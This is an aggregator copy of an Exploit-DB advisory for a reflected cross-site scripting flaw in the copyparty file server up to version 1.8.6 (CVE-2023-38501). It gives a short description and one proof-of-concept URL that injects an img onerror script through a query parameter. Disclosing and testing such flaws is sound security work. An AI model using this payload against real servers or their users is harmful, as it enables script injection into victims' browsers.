3
[webapps] copyparty v1.8.6 - Reflected Cross Site Scripting (XSS)
source link: https://www.exploit-db.com/exploits/51635
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
copyparty v1.8.6 - Reflected Cross Site Scripting (XSS)
# Exploit Title: copyparty v1.8.6 - Reflected Cross Site Scripting (XSS)
# Date: 23/07/2023
# Exploit Author: Vartamtezidis Theodoros (@TheHackyDog)
# Vendor Homepage: https://github.com/9001/copyparty/
# Software Link: https://github.com/9001/copyparty/releases/tag/v1.8.6
# Version: <=1.8.6
# Tested on: Debian Linux
# CVE : CVE-2023-38501
#Description
Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack.
Vulnerability that exists in the web interface of the application could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link.
#POC
https://localhost:3923/?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(1)%3E
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK